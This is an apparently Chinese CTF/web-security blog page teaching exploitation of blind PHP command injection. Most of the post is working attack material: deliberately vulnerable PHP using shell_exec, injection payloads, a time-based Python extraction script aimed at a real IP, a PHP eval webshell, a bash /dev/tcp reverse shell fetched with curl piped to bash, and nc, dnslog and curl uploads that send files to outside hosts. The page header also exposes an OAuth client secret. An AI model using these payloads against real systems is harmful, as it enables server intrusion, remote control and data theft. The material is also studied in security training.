<!DOCTYPE html><html><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="无回显命令执行"><meta name="keywords" content="无回显命令执行"><meta name="author" content="ye1s,undefined"><meta name="copyright" content="ye1s"><title>无回显命令执行【ye1s】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><!-- script(src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML")--><script src="/js/mathjax/mathjax.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"LKL6Q0GQJM","apiKey":"03829f64e2f5c11e4a5e2b8e51e24eb9","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: {"owner":"ye1sec","repo":"comments","client_id":"d5ece338867af32b6dfa","client_secret":"2caf36bbd47977524017f95105315fc9e65f0577"},
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="ye1s" type="application/atom+xml">
</head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#判断方法"><span class="toc-number">1.</span> <span class="toc-text">判断方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#延迟"><span class="toc-number">1.1.</span> <span class="toc-text">延迟</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HTTP请求"><span class="toc-number">1.2.</span> <span class="toc-text">HTTP请求</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DNS-请求"><span class="toc-number">1.3.</span> <span class="toc-text">DNS 请求</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#利用方法"><span class="toc-number">2.</span> <span class="toc-text">利用方法</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#命令执行"><span class="toc-number">2.1.</span> <span class="toc-text">命令执行</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#使用-gt-或-gt-gt"><span class="toc-number">2.1.1.</span> <span class="toc-text">使用&gt;或&gt;&gt;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mv-或-cp"><span class="toc-number">2.1.2.</span> <span class="toc-text">mv 或 cp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#打包压缩"><span class="toc-number">2.1.3.</span> <span class="toc-text">打包压缩</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cut-and-sleep"><span class="toc-number">2.1.4.</span> <span class="toc-text">cut and sleep</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#写入webshell"><span class="toc-number">2.2.</span> <span class="toc-text">写入webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#dnslog"><span class="toc-number">2.3.</span> <span class="toc-text">dnslog</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反弹shell"><span class="toc-number">2.4.</span> <span class="toc-text">反弹shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nc"><span class="toc-number">2.5.</span> <span class="toc-text">nc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#curl上传文件读取源码"><span class="toc-number">2.6.</span> <span class="toc-text">curl上传文件读取源码</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">ye1s</div><div class="author-info-description"></div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/ye1sec" target="_blank">GitHub<i class="icon-dot bg-color5"></i></a><a class="links-button button-hover" href="mailto:431774437@qq.com" target="_blank">E-Mail<i class="icon-dot bg-color5"></i></a><a class="links-button button-hover" href="tencent://message/?uin=431774437&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color7"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">192</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">149</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">12</span></a></div><div class="friend-link"><a class="friend-link-text" href="http://www.m00nback.xyz/" target="_blank">MoonBack</a><a class="friend-link-text" target="_blank">待定</a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">ye1s</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">无回显命令执行</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2020-09-10 | 更新于 2020-09-10</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/%E6%97%A0%E5%9B%9E%E6%98%BE%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/">无回显命令执行</a></div></div></div><div class="main-content"><p>命令执行可能会存在命令执行但没有回显，所以首先要判断命令是否有执行。确定命令可以执行，然后就可以进行无回显命令执行的利用了。    </p>
<a id="more"></a>
<h1 id="判断方法"><a href="#判断方法" class="headerlink" title="判断方法"></a>判断方法</h1><p>测试代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]))&#123;</span><br><span class="line">	shell_exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="延迟"><a href="#延迟" class="headerlink" title="延迟"></a>延迟</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=ls | sleep 3</span><br></pre></td></tr></table></figure>
<p>通过是否延时来判断该条命令是否有执行，有延时则代表命令有执行,延迟3秒</p>
<h2 id="HTTP请求"><a href="#HTTP请求" class="headerlink" title="HTTP请求"></a>HTTP请求</h2><p>1.在公网服务器监听监听端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 4444</span><br></pre></td></tr></table></figure>
<p>2.向目标服务器发起http请求，执行curl命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=|curl ip:4444</span><br></pre></td></tr></table></figure>
<p>如果向目标服务器发起http请求后，公网服务器监听端口得到一些信息，就证明测试点存在命令执行漏洞<br><img src="../../images/loopholes/bindrce/1.png" alt="1.png"></p>
<h2 id="DNS-请求"><a href="#DNS-请求" class="headerlink" title="DNS 请求"></a>DNS 请求</h2><blockquote>
<p>如果请求的目标不是ip地址而是域名，那么域名最终还要转化成ip地址，就肯定要做一次域名解析请求。那么假设我有个可控的二级域名，那么它发出三级域名解析的时候，我这边是能够拿到它的域名解析请求的，这就相当于可以配合DNS请求进行命令执行的判断，这一般就被称为dnslog。（要通过dns请求即可通过ping命令，也能通过curl命令，只要对域名进行访问，让域名服务器进行域名解析就可实现。  </p>
</blockquote>
<p>去<a href="http://ceye.io/" target="_blank" rel="noopener">ceye.io</a>注册，注册完后会给一个域名<br><img src="../../images/loopholes/bindrce/2.png" alt="1.png"><br>如果有该域名解析请求就会被记录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?cmd=ls |curl  `whoami`.awa4xw.ceye.io</span><br><span class="line">?cmd=ls |ping  `whoami`.awa4xw.ceye.io</span><br></pre></td></tr></table></figure>
<p><img src="../../images/loopholes/bindrce/3.png" alt="1.png"></p>
<h1 id="利用方法"><a href="#利用方法" class="headerlink" title="利用方法"></a>利用方法</h1><p>示例代码：<br>index.php </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">"Content-type: text/html; charset=utf-8"</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"></span><br><span class="line">$ip=$_REQUEST[<span class="string">'ip'</span>];</span><br><span class="line"><span class="keyword">if</span>($ip)&#123;</span><br><span class="line">    shell_exec(<span class="string">"ping -c 4 "</span>.$ip);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><h3 id="使用-gt-或-gt-gt"><a href="#使用-gt-或-gt-gt" class="headerlink" title="使用&gt;或&gt;&gt;"></a>使用&gt;或&gt;&gt;</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1 |cat  flag.php &gt;flag.txt</span><br></pre></td></tr></table></figure>
<h3 id="mv-或-cp"><a href="#mv-或-cp" class="headerlink" title="mv 或 cp"></a>mv 或 cp</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?ip=1 |mv  flag.php flag.txt</span><br><span class="line">?ip=1 |cp  flag.php flag.txt</span><br></pre></td></tr></table></figure>
<h3 id="打包压缩"><a href="#打包压缩" class="headerlink" title="打包压缩"></a>打包压缩</h3><p>（1）tar打包或tar打包并压缩</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tar cvf flag.tar flag.php</span><br><span class="line">tar zcvf flag.tar.gz flag.php</span><br></pre></td></tr></table></figure>
<p>（2）zip压缩</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zip flag.zip flag.php</span><br></pre></td></tr></table></figure>
<h3 id="cut-and-sleep"><a href="#cut-and-sleep" class="headerlink" title="cut and sleep"></a>cut and sleep</h3><p>sed指定读取文件的第几行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php | sed -n <span class="string">'2p'</span></span><br></pre></td></tr></table></figure>
<p>提取每一行的第3个字节  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cut -b 3 flag文件</span><br></pre></td></tr></table></figure>
<p>最后</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php | sed -n <span class="string">'2p'</span> |cut -b 1</span><br></pre></td></tr></table></figure>
<p>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">url=<span class="string">"http://119.3.37.185/"</span></span><br><span class="line">flag=<span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">6</span>,<span class="number">65</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">32</span>,<span class="number">127</span>):</span><br><span class="line">        data=<span class="string">"a=`cut -b &#123;&#125; /flag*`;[ $a = \"&#123;&#125;\" ] &amp;&amp; sleep 1"</span>.format(i,chr(j))</span><br><span class="line">        <span class="comment">#print(data)</span></span><br><span class="line">        start_time=time.time()</span><br><span class="line">        requests.post(url=url,data=&#123;<span class="string">"cmd"</span>:data&#125;)</span><br><span class="line">        end_time = time.time()</span><br><span class="line">        spend_time = end_time - start_time</span><br><span class="line">        <span class="keyword">if</span> spend_time&gt;<span class="number">1</span>:</span><br><span class="line">            flag += chr(j)</span><br><span class="line">            print(flag)</span><br></pre></td></tr></table></figure>
<h2 id="写入webshell"><a href="#写入webshell" class="headerlink" title="写入webshell"></a>写入webshell</h2><p>直接写入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ip=1| <span class="built_in">echo</span> <span class="string">"&lt;?php @eval(\$_POST[9415]); ?&gt;"</span> &gt; webshell.php</span><br></pre></td></tr></table></figure>
<p>外部下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget 网址 -O webshell.php <span class="comment">#使用wget下载shell，使用参数-O来指定一个文件名</span></span><br></pre></td></tr></table></figure>
<h2 id="dnslog"><a href="#dnslog" class="headerlink" title="dnslog"></a>dnslog</h2><blockquote>
<p>（1）命令执行时要避免空格，空格会导致空格后面的命令执行不到；<br>（2）将读取的文件命令用反引号``包含起来；<br>（3）拼接的域名有长度限制</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#用&lt;替换读取文件中的空格，且对输出结果base64编码</span><br><span class="line">curl &#96;cat&lt;flag.php|base64&#96;</span><br><span class="line"></span><br><span class="line">#拼接域名(最终构造结果)</span><br><span class="line">curl &#96;cat&lt;flag.php|base64&#96;.awa4xw.ceye.io</span><br><span class="line">#另一种方法(不过有的环境下不可以)&#96;cat flag.php|sed s&#x2F;[[:space:]]&#x2F;&#x2F;g&#96;.awa4xw.ceye.io</span><br></pre></td></tr></table></figure>
<p>这里读取flag.php没有成功   </p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2><p>1.首先在公网服务器使用nc命令监听端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 4444 <span class="comment">#或nc -vv -lp 4444</span></span><br></pre></td></tr></table></figure>
<p>2.然后在公网服务器上写一个文件(我写入到qwzf文件)，内容是下面命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/x.x.x.x/4444 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<p>3.最终浏览器上执行的payload(实际上就是在目标机执行curl x.x.x.x:8002/qwzf|bash)</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=|curl x.x.x.x:8002/qwzf|bash</span><br></pre></td></tr></table></figure>
<h2 id="nc"><a href="#nc" class="headerlink" title="nc"></a>nc</h2><p><strong>tcp</strong><br>1.公网服务器监听4444端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -tlp 4444</span><br></pre></td></tr></table></figure>
<p>2.目标服务器执行如下命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=|nc -t x.x.x.x 4444 &lt; flag.php</span><br></pre></td></tr></table></figure>

<p>-u参数调整为udp,当tcp不能使用的时候使用 </p>
<p><strong>udp</strong>    </p>
<p>1.公网服务器监听4444端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -ulp 4444</span><br></pre></td></tr></table></figure>
<p>2.目标服务器执行如下命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=|nc -u x.x.x.x 4444 &lt; flag.php</span><br></pre></td></tr></table></figure>
<h2 id="curl上传文件读取源码"><a href="#curl上传文件读取源码" class="headerlink" title="curl上传文件读取源码"></a>curl上传文件读取源码</h2><p>利用条件：目标服务器curl命令可以正常执行</p>
<p>使用curl -F将flag文件上传到Burp的Collaborator Client(Collaborator Client 类似DNSLOG，其功能要比DNSLOG强大，主要体现在可以查看POST请求包以及打Cookies)</p>
<p>1.获取Collaborator Client分配给Burp的链接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">打开Burp主界面 -&gt; 菜单（Burp）-&gt; Collaboraor Client -&gt; 点击</span><br><span class="line">Copy to Clipboard</span><br></pre></td></tr></table></figure>
<p>2.拼接payload并在命令执行处提交</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip=1|curl -X  POST -F xx=@flag.php http://6hoo9jdwyggr4rkwrgoy1f51bshi57.burpcollaborator.net</span><br></pre></td></tr></table></figure>
<p>3.查看Collaborator Client收到的数据<br><img src="../../images/loopholes/bindrce/4.png" alt="1.png"></p>
<p>参考文章：<br><a href="https://xz.aliyun.com/t/8125" target="_blank" rel="noopener">浅谈PHP无回显命令执行的利用</a><br><a href="https://cloud.tencent.com/developer/article/1523441" target="_blank" rel="noopener">CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题</a></p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ye1s</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://blog.cfyqy.com/article/e8fed0e.html">https://blog.cfyqy.com/article/e8fed0e.html</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://blog.cfyqy.com">ye1s</a>！</span></div></div><div class="post-copyright" id="comments-container"><script src="/js/comments/gitment.js"></script></div><script>let arr = location.href.split('/#more')[0].split('/');
let title = arr[arr.length - 1];
if (title === '') {
    title = arr[arr.length - 2]
}
var flag = false;
var gitFun = function () {
    try {
        var gitmentObj = window.GLOBAL_CONFIG.gitment;
        var gitment = new Gitment({
            id: decodeURI(title), // 可选。默认为 location.href
            owner: gitmentObj.owner,
            repo: gitmentObj.repo,
            oauth: {
                client_id: gitmentObj.client_id,
                client_secret: gitmentObj.client_secret
            },
        });
        gitment.render('comments-container');
        flag = true;
    } catch (e) {
        flag = false;
    }
}
var setIn = setInterval(() => {
    if (!flag) {
        gitFun();
    } else {
        clearInterval(setIn);
    }
}, 200);</script></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/article/77cfb00d.html"><i class="fas fa-angle-left">&nbsp;</i><span>2020年比赛题目集合</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/article/8a65f310.html"><span>linux 常用命令记录</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fas fa-file-o"></i></span><span id="busuanzi_value_page_pv"></span><span></span></div><div class="copyright">&copy;2017 ～ 2021 By ye1s</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/daovoice.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>